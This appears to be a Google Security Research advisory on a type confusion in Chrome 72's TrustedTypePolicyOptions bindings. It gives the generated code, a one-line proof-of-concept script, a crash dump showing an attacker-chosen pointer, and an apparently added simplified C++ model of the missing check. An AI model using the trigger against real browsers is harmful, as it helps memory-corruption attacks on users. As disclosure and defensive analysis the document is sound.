"Google Chrome 72.0.3626.81 - 'V8TrustedTypePolicyOptions::ToImpl' Type Confusion"

Author: Google Security Research

Platform: multiple

Release date: 2019-04-03

VULNERABILITY DETAILS
The binding code generator doesn't add checks to ensure that the callback
properties of a dictionary are indeed JS functions. For example, for
the TrustedTypePolicyOptions dictionary:
https://cs.chromium.org/chromium/src/third_party/blink/renderer/core/trustedtypes/trusted_type_policy_options.idl?rcl=6c2e672967359ad32d19af8b09873adab2c0beec&l=7
-------------------
dictionary TrustedTypePolicyOptions {
   CreateHTMLCallback createHTML;
   CreateScriptCallback createScript;
   CreateURLCallback createScriptURL;
   CreateURLCallback createURL;
   boolean exposed = false;
};

callback CreateHTMLCallback = DOMString (DOMString input);
callback CreateScriptCallback = DOMString (DOMString input);
callback CreateURLCallback = USVString (DOMString input);
-------------------

the code is generated as follows:
https://cs.chromium.org/chromium/src/out/Debug/gen/third_party/blink/renderer/bindings/core/v8/v8_trusted_type_policy_options.cc?rcl=077f8deee2dee38d4836be1df20115eba4884f69&l=35
-------------------
void V8TrustedTypePolicyOptions::ToImpl(v8::Isolate* isolate, v8::Local<v8::Value> v8_value, TrustedTypePolicyOptions* impl, ExceptionState& exception_state) {
  if (IsUndefinedOrNull(v8_value)) {
    return;
  }
  if (!v8_value->IsObject()) {
    exception_state.ThrowTypeError("cannot convert to dictionary.");
    return;
  }
  v8::Local<v8::Object> v8Object = v8_value.As<v8::Object>();
  ALLOW_UNUSED_LOCAL(v8Object);

  const v8::Eternal<v8::Name>* keys = eternalV8TrustedTypePolicyOptionsKeys(isolate);
  v8::TryCatch block(isolate);
  v8::Local<v8::Context> context = isolate->GetCurrentContext();
  v8::Local<v8::Value> create_html_value;
  if (!v8Object->Get(context, keys[0].Get(isolate)).ToLocal(&create_html_value)) {
    exception_state.RethrowV8Exception(block.Exception());
    return;
  }
  if (create_html_value.IsEmpty() || create_html_value->IsUndefined()) {
    // Do nothing.
  } else {
    V8CreateHTMLCallback* create_html_cpp_value = V8CreateHTMLCallback::Create(create_html_value.As<v8::Function>()); //******* cast with no prior check
    impl->setCreateHTML(create_html_cpp_value);
  }               
[...]
-------------------

Thus, any JS object might be interpreted as a function.
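
The missing check, shown as an added example on a simplified model rather than Chromium's or V8's own code: a dictionary converter that rejects a callback member unless it is a function before storing it. `Value`, `Object`, `Callback`, `PolicyOptions`, `ConvertCallback` and the error text are hypothetical stand-ins for the real binding types.

```cpp
// Simplified model, not Chromium or V8 code: Value, Object, Callback and
// PolicyOptions are hypothetical stand-ins for the real binding types.
#include <map>
#include <string>

enum class Kind { kUndefined, kNumber, kFunction };
struct Value {
  Kind kind;
  double number;     // payload when kind == kNumber
  std::string name;  // payload when kind == kFunction
  bool IsUndefined() const { return kind == Kind::kUndefined; }
  bool IsFunction() const { return kind == Kind::kFunction; }
};
Value Number(double n) { return Value{Kind::kNumber, n, ""}; }
Value Func(const std::string& n) { return Value{Kind::kFunction, 0.0, n}; }
using Object = std::map<std::string, Value>;
struct Callback { bool set = false; std::string name; };
struct PolicyOptions {  // models the TrustedTypePolicyOptions dictionary
  Callback create_html, create_script, create_script_url, create_url;
};
// Converts one callback member. A missing or undefined member is skipped;
// a present non-function member is rejected instead of being cast.
bool ConvertCallback(const Object& obj, const std::string& key,
                     Callback* out, std::string* error) {
  auto it = obj.find(key);
  if (it == obj.end() || it->second.IsUndefined()) return true;
  if (!it->second.IsFunction()) {  // the check missing from the generated code
    *error = "member " + key + " is not a function.";
    return false;
  }
  out->set = true;
  out->name = it->second.name;
  return true;
}

// Checked counterpart of ToImpl: fails on the first invalid callback member.
bool ToImpl(const Object& obj, PolicyOptions* impl, std::string* error) {
  return ConvertCallback(obj, "createHTML", &impl->create_html, error) &&
         ConvertCallback(obj, "createScript", &impl->create_script, error) &&
         ConvertCallback(obj, "createScriptURL", &impl->create_script_url, error) &&
         ConvertCallback(obj, "createURL", &impl->create_url, error);
}

int main() {  // constructed input mirroring the reproduction case
  Object options{{"createHTML", Number(0x41414141)}};
  PolicyOptions impl;
  std::string error;
  return ToImpl(options, &impl, &error) ? 1 : 0;  // 0: value was rejected
}
```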


VERSION
Google Chrome 72.0.3626.81 (Official Build) (64-bit) 
Please note that the TrustedTypes feature is currently hidden behind the
"experimental platform features" flag.


REPRODUCTION CASE
<script>
TrustedTypes.createPolicy('foo', { createHTML: 0x41414141 });
</script>


(790.b30): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
chrome_child!v8::internal::JSReceiver::GetCreationContext+0xa:
00007ffe`ba967f5a 488b41ff        mov     rax,qword ptr [rcx-1] ds:41414140`ffffffff=????????????????
0:000> r
rax=00001313b3350115 rbx=00006fc6d6eaf920 rcx=4141414100000000
rdx=000000e521dfd190 rsi=000000e521dfd190 rdi=000000e521dfd1d8
rip=00007ffeba967f5a rsp=000000e521dfd130 rbp=000000e521dfd290
 r8=00007ffebfb25930  r9=0000000000000018 r10=0000000000000005
r11=00003f2bc628c240 r12=000000e521dfd330 r13=000001e7dbd16650
r14=000001e7ddc22a90 r15=00003f2bc62364b8
iopl=0         nv up ei pl nz na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
chrome_child!v8::internal::JSReceiver::GetCreationContext+0xa:
00007ffe`ba967f5a 488b41ff        mov     rax,qword ptr [rcx-1] ds:41414140`ffffffff=????????????????
0:000> k
 # Child-SP          RetAddr           Call Site
00 000000e5`21dfd130 00007ffe`ba967f24 chrome_child!v8::internal::JSReceiver::GetCreationContext+0xa [C:\b\c\b\win64_clang\src\v8\src\objects.cc @ 4010] 
01 000000e5`21dfd170 00007ffe`bab1a1d7 chrome_child!v8::Object::CreationContext+0x24 [C:\b\c\b\win64_clang\src\v8\src\api.cc @ 4859] 
02 000000e5`21dfd1b0 00007ffe`bd196835 chrome_child!blink::CallbackFunctionBase::CallbackFunctionBase+0x47 [C:\b\c\b\win64_clang\src\third_party\blink\renderer\platform\bindings\callback_function_base.cc @ 13] 
03 000000e5`21dfd210 00007ffe`bd195101 chrome_child!blink::V8TrustedTypePolicyOptions::ToImpl+0x125 [C:\b\c\b\win64_clang\src\out\Release_x64\gen\third_party\blink\renderer\bindings\core\v8\v8_trusted_type_policy_options.cc @ 57] 
04 000000e5`21dfd2f0 00007ffe`ba957f93 chrome_child!blink::V8TrustedTypePolicyFactory::CreatePolicyMethodCallback+0x211 [C:\b\c\b\win64_clang\src\out\Release_x64\gen\third_party\blink\renderer\bindings\core\v8\v8_trusted_type_policy_factory.cc @ 234] 
05 000000e5`21dfd3c0 00007ffe`bbbebb9f chrome_child!v8::internal::FunctionCallbackArguments::Call+0x253 [C:\b\c\b\win64_clang\src\v8\src\api-arguments-inl.h @ 147] 
06 000000e5`21dfd4e0 00007ffe`bbbeb631 chrome_child!v8::internal::`anonymous namespace'::HandleApiCallHelper<0>+0x20f [C:\b\c\b\win64_clang\src\v8\src\builtins\builtins-api.cc @ 111] 
07 000000e5`21dfd5e0 00007ffe`ba957ca1 chrome_child!v8::internal::Builtin_Impl_HandleApiCall+0x111 [C:\b\c\b\win64_clang\src\v8\src\builtins\builtins-api.cc @ 0] 
08 000000e5`21dfd6a0 00007ffe`bc23cdcf chrome_child!v8::internal::Builtin_HandleApiCall+0x41 [C:\b\c\b\win64_clang\src\v8\src\builtins\builtins-api.cc @ 127] 
09 000000e5`21dfd700 00003921`bff1b0d1 chrome_child!Builtins_CEntry_Return1_DontSaveFPRegs_ArgvOnStack_NoBuiltinExit+0x4f